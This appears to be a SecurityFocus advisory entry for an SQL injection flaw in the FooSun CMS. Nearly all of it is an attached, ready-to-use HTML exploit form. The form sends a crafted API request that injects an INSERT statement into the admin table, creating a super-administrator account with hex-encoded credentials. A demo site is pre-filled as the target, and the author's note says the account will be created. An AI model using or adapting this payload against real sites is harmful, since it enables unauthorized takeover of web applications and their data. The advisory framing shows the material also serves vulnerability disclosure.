7 lines
No EOL
1.7 KiB
HTML
7 lines
No EOL
1.7 KiB
HTML
source: https://www.securityfocus.com/bid/26552/info
|
|
|
|
FooSun is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
|
|
|
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
|
|
!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD><TITLE>foosun create new admin exp Codz By flyh4t</TITLE> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <META content="MSHTML 6.00.2800.1479" name=GENERATOR></HEAD> <BODY style="FONT-SIZE: 9pt">------------------------ foosun create new admin exp Codz By flyh4t --------------------------- <FORM name=frm method=post target=_blank>foosun path: <INPUT style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid" size=65 value=http://demo.foosun.net name=act><br> <INPUT type="hidden" style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid" size=65 value=/api/Api_response.asp?syskey=8076ac99d47feeb6&password=flyh4t&SaveCookie=1&UserName=flyh4t';insert%20into%20FS_MF_Admin%20(Admin_Name,Admin_Pass_Word,Admin_Is_Super)values(0x6F006C0064006A0075006E00,0x3800330061006100340030003000610066003400360034006300370036006400,1)-- name=sql><br> <INPUT onclick="Javascipt:frm.action=document.all.act.value+document.all.sql.value; frm. submit();" type=button value=". ." name=Send></FORM> Hey boy, fun the game... <br> It is just a exp for the bug of foosun...<br> can create a new admin oldjun/12345678...<br> </BODY> </HTML> |